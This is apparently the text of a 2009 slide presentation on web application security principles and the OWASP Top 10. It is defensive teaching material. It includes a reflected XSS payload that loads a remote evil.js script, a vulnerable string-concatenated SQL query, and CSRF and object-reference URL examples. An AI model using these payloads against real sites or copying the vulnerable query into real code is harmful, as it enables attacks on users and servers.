Академический Документы
Профессиональный Документы
Культура Документы
Don Ankney
June 2009
1
DISCLAIMER
• This presentation is my own work, done on my own time, and is
not sanctioned or vetted by Microsoft.
2
AGENDA
• General Web Application Security Principals:
• Trust
• Data handling
• Defense in depth
• “Think Evil”
• Threat Modeling
• OWASP Top 10
3
GENERAL PRINCIPALS
How to think about web application security
4
TRUST
• Trust no one.
5
TRUST BOUNDARIES
User System
Application
Database
6
TRUST BOUNDARIES
• User interaction includes:
7
DATA HANDLING
• Bringing data across a trust boundary means both making sure you
can trust data coming in and properly encoding the data going out.
• The two primary techniques for building trust are validation and
sanitization.
8
WHITELISTS V. BLACKLISTS
• A whitelist is simply a list of something you do want or expect.
9
DATA VALIDATION
• Data validation is the act of determine whether or not input
conforms to your expectations.
10
DATA SANITIZATION
• Data sanitization modifies the input so that it matches the desired
criteria.
(866)500-6738
8665006738
11
PRINCIPAL OF LEAST
PRIVILEGE
• Each user should have permissions that allow them to
accomplish a given task, but no more.
• Evaluate your system and come up with role-based scenarios.
What are the common tasks? How are they grouped into user
roles?
• A user may have more than one role, but should never have
more access than they need.
12
DEFENSE IN DEPTH
• Security is like an onion …
• Always implement the strongest mitigations you can think of.
This is your front line.
• Don’t stop there – build additional layers as fall-back positions.
This is defense in depth.
• Make sure that detection is one of those layers. Design a good
logging system and catch an intruder before he makes it past the
second layer.
13
CHALLENGE YOUR
ASSUMPTIONS
• Don’t assume that the attacker is using your client software – the user
is always untrusted.
• Don’t assume that the attacker is following your page flow – the front
door may not be the only way in.
14
“THINK EVIL”
• Bruce Schneier calls this the “Security Mindset” (blog link).
15
THREAT MODELING
• Threat modeling is systematic.
• Every time you cross a trust boundary, look at both of the connected components
and enumerate the threats.
• That’s it – the rest is implementation. Just make sure you follow through on the
mitigations.
16
“STRIDE” FRAMEWORK
• Many threat modeling frameworks exist – Dread, Trike, CVSS, Octave, AS/NZS 4360.
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege
17
OWASP TOP TEN
The 10 most common web application vulnerabilities
18
OWASP TOP TEN 2007
• Cross Site Scripting (XSS)
• Injection Flaws
• Insecure Communications
19
CROSS SITE SCRIPTING
• Cross site scripting is an attack against your users. A successful attack
will allow the attacker to run arbitrary Javascript in a user’s browser.
• The trouble with XSS is that the larger the application, the more
paths data can travel through it. You have to nail all of them.
20
REFLECTED XSS
• Data from a user is accepted by a page, processed, and returned
to the user.
• This type of vulnerability is often detectable by automated tools
making it the most common.
• It’s scope is limited to the user that submits the malicious
request (often via phishing or other social engineering attacks).
21
REFLECTED XSS
• This request simply tells me hello:
http://example.com/hello.cgi?name=Don
• This isn’t as friendly:
http://example.com/hello.cgi?name=<SCRIPT
SRC=http://hackerco.de/evil.js></SCRIPT>
23
CROSS SITE SCRIPTING
• To fight XSS, you need to bring data across trust boundaries safely.
24
• A couple of gotchas:
• Attackers often encode the attack strings to bypass whitelists.
• Before checking the whitelist, make sure the input encoding matches the
application’s internal representation.
25
INJECTION FLAWS
• This is an attack against your server that can allow arbitrary
code execution.
• SQL Injection is the most infamous type of code injection attack.
• Other types of injection include LDAP, XML, HTTP, XAMP, PHP,
JSP, Python, Perl …
• Instead of tracking the individual techniques, you can think about
this as interpreter injection.
26
INTERPRETER INJECTION
• I can think of three ways that code can be injected into an interpreter:
• User input
• Dynamic includes
27
SQL INJECTION
• Consider this pseudo-code example:
Query query = “SELECT sensitiveData FROM table WHERE
table.owner = ‘“ + userNameFromGet + “’”;
query.execute();
28
SQL INJECTION
• There’s good news about SQL injection. We know how to solve it.
29
PARAMETERIZED QUERIES
• Here, the structure of the query is separate from its parameters. Even
if the parameters product functional SQL statement, it is treated as
data.
Query query = “SELECT sensitiveData FROM table WHERE
table.owner=‘?1’”;
query.setParam(1, “userNameFromGet”);
query.execute();
30
MALICIOUS FILE EXECUTION
• Just like interpreter injection, this allows an attacker to execute
arbitrary code on your system, only this is not limited only to
interpreted code.
• This is primarily about upload handling, though there are other ways
of getting malicious code onto a server (SMB, attacking the update
process, etc).
31
MALICIOUS FILE EXECUTION
• Remember that the OS and filesystem are untrusted:
• Do not make system calls from within your code – use libraries to
accomplish the same thing.
• Don’t allow direct reference to the file system. Use a wrapper that
enforces access policy.
32
INSECURE DIRECT OBJECT REFERENCE
• This is where a developer exposes an internal implementation object
to the end user – state information and method parameters become
visible.
33
INSECURE DIRECT OBJECT REFERENCE
• This is a very common example:
http://example.com/photos.cgi?
gallery=1
• You can enter an number you’d like into the URI and view the
photos in that gallery.
34
INSECURE DIRECT OBJECT REFERENCE
• Here’s another common example:
http://example.com/photos.cgi?
method=add&gallery=1
35
INSECURE DIRECT OBJECT REFERENCE
• Don’t ever directly expose your implementation in this way.
• Write a wrapper class. Remember that the user input is not trusted,
so bring it across the trust boundary safely.
36
CROSS SITE REQUEST
FORGERY
• Cross Site Request Forgery (CSRF) occurs when the browser
submits a request on an attacker’s behalf.
• Consider this:
http://example.com/transfer.cgi?
dest=1&amount=1
• If the user has an active, authenticated session, the attacker can
transfer funds to any account.
37
CROSS SITE REQUEST
FORGERY
• Yes, this does require a little bit of social engineering – the attacker
has to get a user to click on a link, right?
38
CROSS SITE REQUEST
FORGERY
• Solving this is easy. Submit a token with each request. If an attacker can’t predict the
token, they can’t trick the browser into submitting a request on their behalf.
• At the very least, the token needs to be unique to the user. Other common
strategies include session-unique and function-unique tokens.
• If the token is even mildly predictable, then the attacker can play the numbers. Make
it truly unpredictable – it should meet the same standards as your session token.
39
CROSS SITE REQUEST
FORGERY
<form action = “/transfer.cgi” method = “post”>
<input type=“hidden” name=“CSRFToken”
value=“GUID or something similar”>
<input type=“text” name=“dest” value=“1”>
<input type=“text” name=“amount” value =“1”>
</form>
Notice:
• POST, not GET – posting a form doesn’t leave a token in the referer header
or history.
• The token isn’t stored in the cookie – you have to use a vehicle that isn’t auto-
submitted. A header could have worked as well.
40
INFORMATION LEAKAGE
• UX folks are always after developers to give their users friendly, informative error
messages when something fails.
• Friendly is good, but informative often gives attackers actionable intelligence about
how your application is written.
• This is one of the most common techniques used to discover SQL Injection vulnerabilities.
• Make sure the generic messages are uniform – an attacker can use slight inconsistencies in the
error messages to differentiate between error states.
41
BROKEN AUTHENTICATION
& SESSION MANAGEMENT
• Identity management is difficult to write well.
• Password recovery/change
• Password requirements
42
BROKEN AUTHENTICATION
• This is a significant engineering challenge that has already been solved
for you.
• This is one of those things that’s very easy to do almost right, but
difficult to get really right.
43
INSECURE CRYPTOGRAPHIC STORAGE
• Cryptography is hard. Don’t invent your own ciphers. Don’t
implement an established cipher on your own.
• Not all ciphers are created equal – make sure you’re using a strong
cipher.
44
INSECURE
COMMUNICATIONS
• This is the classic eavesdropping scenario. Remember that all data
transmitted in an unencrypted pipe is subject to interception.
• Session stealing
• Replay attacks
• If you can’t SSL everything, do some analysis of the flow through your application.
45
FAILURE TO RESTRICT URL
ACCESS
• Many application developers assume that because a link is not visible
to an attacker, the attacker will not be able to find it.
46
FINAL THOUGHTS
• Security is a lifecycle -- it begins when you have that first idea and
doesn’t end until the product is retired.
47
BIBLIOGRAPHY
• Fogie, Seth, Jeremiah Grossman, Robert Hansen, Anton Rager, and Petko D. Petkov. Xss Attacks: Cross Site
Scripting Exploits and Defense. Syngress, 2007.
• Gallagher, Tom, Lawrence Landauer, and Bryan Jeffries. Hunting Security Bugs. Microsoft Press, 2006.
• Howard, Michael, and David LeBlanc. Writing Secure Code, Second Edition. Microsoft Press, 2003.
• Howard, Michael, David LeBlanc, and John Viega. 19 Deadly Sins of Software Security (Security One-Off).
McGraw-Hill Osborne Media, 2005.
• Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Discovering and Exploiting Security
Flaws. Wiley, 2007.
• Swiderski, Frank, and Window Snyder. Threat Modeling (Microsoft Professional). Microsoft Press, 2004.
48
IF YOU ONLY READ ONE
BOOK ...
• Creative Commons License
• $12.83 @ Lulu.com
• Download a .pdf for free
here.
• Also available in Spanish
and Japanese
49
I’M WEB 2.0
• Blog: http://hackerco.de
• Linkedin: http://linkedin.com/pub/don-ankney/6/213/651
• Twitter: http://twitter.com/dankney
• E-mail: dankney@hackerco.de
50
QUESTIONS?
51